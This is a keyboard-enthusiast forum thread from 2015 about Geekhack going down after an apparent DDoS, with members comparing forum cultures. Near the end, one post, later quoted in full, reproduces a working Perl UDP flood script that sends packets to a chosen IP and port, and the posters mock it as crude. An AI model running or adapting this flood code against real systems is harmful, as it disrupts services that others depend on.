Is Geekhack down?

jbondeson

26 Jun 2015, 21:53

photekq wrote:I think it's a combination of a lot of things, with one of the big ones being novelty keycaps and the drama/idiocy that surrounds them.
Yeah, novelty-hysteria has latched onto the GH brain stem.

Artificial scarcity, and obsessive collectors, what could possibly go wrong?

It's like reliving 1990s beanie baby fever...

baldgye

26 Jun 2015, 22:19

jbondeson wrote: It's like reliving 1990s beanie baby fever...
beanie baby's are awesome wtf

CLiB

26 Jun 2015, 22:49

man, i haven't posted here in forever...

with GH down, how else can i waste time at work? serious question...

Muirium
µ

26 Jun 2015, 22:53

GH downtime = more exclusive uptime.

Through the looking glass here, people.

derzemel

26 Jun 2015, 22:56

CLiB wrote: man, i haven't posted here in forever...

You could waste your time around these parts, with the hardcore collectors (not me, I'm still fumbling around :P )

Muirium
µ

26 Jun 2015, 22:59

Try the forum spy. We have less threads around here but they're generally pretty busy and informative.

First of all though: where's your monocle? This is DT, gentlemen!

kebby

26 Jun 2015, 23:16

Muirium wrote: Try the forum spy. We have less threads around here but they're generally pretty busy and informative.

Thanks! That's exactly what I've longed for. GH wouldn't happen to have a similar feature, would it?

This downtime is starting to be considerable.

jbondeson

26 Jun 2015, 23:36

baldgye wrote: beanie baby's are awesome wtf
People can ruin anything.

scottc

26 Jun 2015, 23:42

derzemel wrote:
CLiB wrote: man, i haven't posted here in forever...

You could waste your time around these parts, with the hardcore collectors (not me, I'm still fumbling around :P )
Fumbling around with TWO DOLCH KEYBOARDS?!? And in rare layouts, no less!

webwit
Wild Duck

26 Jun 2015, 23:55

I've heard that the best way to help GH get back up is to go there and press F5 continuously. The winning F5 kickstart will get free keycaps! *pokerface*

SL89

27 Jun 2015, 00:03

kebby wrote:
Muirium wrote: Try the forum spy. We have less threads around here but they're generally pretty busy and informative.

Thanks! That's exactly what I've longed for. GH wouldn't happen to have a similar feature, would it?

This downtime is starting to be considerable.
GH has had this feature as long as I've been around.

kebby

27 Jun 2015, 00:30

SL89 wrote: GH has had this feature as long as I've been around.
That's nice. Just didn't know the term I needed to look for to find it previously. Took a look at a pre-downtime tab that has GH open and yeah, it does seem to have a "Spy" on the menu.

BlueBär

27 Jun 2015, 00:44

photekq wrote: Seriously, GH is about 95% cancer. It's gone up from about 50% in the space of just a few months!
/signed

SL89

27 Jun 2015, 01:12

kebby wrote:
SL89 wrote: GH has had this feature as long as I've been around.
That's nice. Just didn't know the term I needed to look for to find it previously. Took a look at a pre-downtime tab that has GH open and yeah, it does seem to have a "Spy" on the menu.
I did the same thing on both sites, I didn't even know what the term Spy meant. :lol:

Redmaus
Gotta start somewhere

27 Jun 2015, 01:13

I am actually from reddit also, but I made sure my cancerous tumor stayed there.

Now I am a proper gentleman here at DT.

pyrelink

27 Jun 2015, 01:21

I came from Reddit simply because it was the first link that I found on Google when searching for a way to identify a few old keyboards that I had found. I stuck around for about a year or so and close to dropped interest in the hobby as all I wanted was to learn and uncover vintage keyboards, and all I could see at GH was money and drama, and Reddit was for showing off, and bad at retaining significant discussion. I only wound up visiting DT as a last resort after I reread a PM conversation I had with Haata on Reddit, about the first keyboard I posted. Sure glad I did.

XMIT
[ XMIT ]

27 Jun 2015, 02:58

As a seller I like that there is money at GH. :evilgeek:

Seriously, though, if you want updates on GH please check this Twitter page. Apparently they were hit by a big DDOS today.

https://twitter.com/geekhackinfo

I'm hanging out on #geekhack and #deskthority just for fun.

SL89

27 Jun 2015, 03:51

XMIT wrote: As a seller I like that there is money at GH. :evilgeek:

Seriously, though, if you want updates on GH please check this Twitter page. Apparently they were hit by a big DDOS today.

https://twitter.com/geekhackinfo

I'm hanging out on #geekhack and #deskthority just for fun.
Yay IRC! It gets lonely but we have a different core group across all the channels including #mechboards

Also it seems like Money = GH which seems to be the only reason why some 'vendors' and their captive audience have any reason to be on there.

And lol at the DDOS.

kebby

27 Jun 2015, 03:53

So because of a DDOS they're... voluntarily out of service until further notice. :? Guess that's a very successful DDOS then.

XMIT
[ XMIT ]

27 Jun 2015, 04:02

SL89 wrote: Also it seems like Money = GH which seems to be the only reason why some 'vendors' and their captive audience have any reason to be on there.
TBF I don't consider myself a vendor even though Keypocalypse is on the Vendors forum. I'm just another hobbyist helping a friend sell some keyboards. It just so happens that the friend is elecplus and "some" is "hundreds of".

SL89

27 Jun 2015, 05:48

Less so you XMIT and more so others with less altruistic reasons.

Hak Foo

27 Jun 2015, 06:35

It definitely seems like the two forums developed their own personality. There's much more of a vintage-collector focus here, and much less of a "Look at the new shiny, or the new keycaps for the new shiny".

rsbseb
-Horned Rabbit-

27 Jun 2015, 06:42

Deskthority definitely has more of an academic personality to it. I personally find the site easier to navigate and read than GH. Plenty of good things over at GH but DT is certainly more comfortable for me, GH can be a good place to visit but this is home.

Blaise170
ALPS キーボード

27 Jun 2015, 07:39

I like the atmosphere here but there aren't very many news posts whenever I visit. How else am I going to get that post count?

fanpeople

27 Jun 2015, 08:19

So Googled what happened to GH and got this Youtube video...

https://www.youtube.com/watch?v=Fp2o4Q4tQo4

Maby he should go outside and throw a ball for the dog or something instead. I feel like he used his proper Youtube channel with lots of pers details.

Well I am going to go outside and throw the ball of the dog now.

hwood34

27 Jun 2015, 08:52

pyrelink wrote: I came from Reddit simply because it was the first link that I found on Google when searching for a way to identify a few old keyboards that I had found. I stuck around for about a year or so and close to dropped interest in the hobby as all I wanted was to learn and uncover vintage keyboards, and all I could see at GH was money and drama, and Reddit was for showing off, and bad at retaining significant discussion. I only wound up visiting DT as a last resort after I reread a PM conversation I had with Haata on Reddit, about the first keyboard I posted. Sure glad I did.
Oh yeah I really do wonder what happened to GH to make it go downhill. Certainly has nothing to do with the flood of redditors with asking the same stupid questions again and again and filling up the boards with shit.

(not all of you are bad but...)

hwood34

27 Jun 2015, 08:59

Hak Foo wrote: It definitely seems like the two forums developed their own personality. There's much more of a vintage-collector focus here, and much less of a "Look at the new shiny, or the new keycaps for the new shiny".
Yeah, even if you don't browse it much, you can at least appreciate the wealth of information on this site

jacobolus

27 Jun 2015, 10:26

Deskthority is more about buying and restoring keyboards from the 60s–80s; Geekhack is more about modding and building new things, plus a bunch of silly keycaps that wish they were figurines. Deskthority is dominated by Europeans, while Geekhack is mostly Americans. My guess is that the Geekhack community skews slightly younger, and my general impression is that Deskthority is a bit grumpier overall, while Geekhack tolerates more nonsense. But obviously there is significant overlap between the two. Geekhack has higher traffic and more contributors, making most discussions there more active, and the range of interests and ideas a bit broader. Reddit is mostly American teenagers with a small number of token adults, and as a result conversations tend to be filled with bad jokes, misinformation, and lots of drama, but also lots of enthusiasm. (Nothing inherently wrong with that, teenagers need somewhere to hang out too.)
Last edited by jacobolus on 27 Jun 2015, 10:32, edited 1 time in total.

webwit
Wild Duck

27 Jun 2015, 10:31

That script seems a bit peculiar, I was expecting something more sophisticated. That's no DDoS, but a stupid one-on-one wrestling match. I hope his cheap ISP router didn't catch fire. Such a silly attack shouldn't be getting past any firewall.

Code: Select all

#!/usr/bin/perl

##
# PwNy<----
##

use Socket;
use strict;

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print <<EOTEXT;

oooooo   oooooo     oooo  o8o  oooooooooooo  o8o  
 `888.    `888.     .8'   `"'  `888'     `8  `"'  
  `888.   .8888.   .8'   oooo   888         oooo  
   `888  .8'`888. .8'    `888   888oooo8    `888  
    `888.8'  `888.8'      888   888    "     888  
     `888'    `888'       888   888          888  
      `8'      `8'       o888o o888o        o888o 

ooooo      ooo  o8o  ooooooo  ooooo 
`888b.     `8'  `"'   `8888    d8'  
 8 `88b.    8  oooo     Y888..8P    
 8   `88b.  8  `888      `8888'     
 8     `88b.8   888     .8PY888.    
 8       `888   888    d8'  `888b   
o8o        `8  o888o o888o  o88888o

Welcome to Doxem NIX<3 - WhEn IN DoUbt KnoCk Em OuT, gEt SmAcKeD ChEeSe 
DiCk DoS Coded by:Doxem
EOTEXT

print "~Doxem  NiX ShiT oN~ $ip " . ($port ? $port : "random") . " 
ResPecT WiFi" .
  ($size ? "$size-byte" : "THIS BOOUTER DONT WORK :(...O SHIT CALL 911 HIS MODEM ON FIRE!!") . " 
~Doxem~ ~i'LL SlAp TiLL YoU CrY~ " .
  ($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1500000-64)+64) ;
  $pport = $port ? $port : int(rand(1500000))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, 
$iaddr));}

scottc

27 Jun 2015, 10:40

webwit wrote: That script seems a bit peculiar, I was expecting something more sophisticated. That's no DDoS, but a stupid one-on-one wrestling match. I hope his cheap ISP router didn't catch fire. Such a silly attack shouldn't be getting past any firewall.

Code: Select all

#!/usr/bin/perl

##
# PwNy<----
##

use Socket;
use strict;

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print <<EOTEXT;

oooooo   oooooo     oooo  o8o  oooooooooooo  o8o  
 `888.    `888.     .8'   `"'  `888'     `8  `"'  
  `888.   .8888.   .8'   oooo   888         oooo  
   `888  .8'`888. .8'    `888   888oooo8    `888  
    `888.8'  `888.8'      888   888    "     888  
     `888'    `888'       888   888          888  
      `8'      `8'       o888o o888o        o888o 

ooooo      ooo  o8o  ooooooo  ooooo 
`888b.     `8'  `"'   `8888    d8'  
 8 `88b.    8  oooo     Y888..8P    
 8   `88b.  8  `888      `8888'     
 8     `88b.8   888     .8PY888.    
 8       `888   888    d8'  `888b   
o8o        `8  o888o o888o  o88888o

Welcome to Doxem NIX<3 - WhEn IN DoUbt KnoCk Em OuT, gEt SmAcKeD ChEeSe 
DiCk DoS Coded by:Doxem
EOTEXT

print "~Doxem  NiX ShiT oN~ $ip " . ($port ? $port : "random") . " 
ResPecT WiFi" .
  ($size ? "$size-byte" : "THIS BOOUTER DONT WORK :(...O SHIT CALL 911 HIS MODEM ON FIRE!!") . " 
~Doxem~ ~i'LL SlAp TiLL YoU CrY~ " .
  ($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1500000-64)+64) ;
  $pport = $port ? $port : int(rand(1500000))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, 
$iaddr));}
Wow. That's shocking. There's more shitty "hacker text" than actual code. Though... I wouldn't be entirely surprised.

Return to “Geekhacker refugee camp”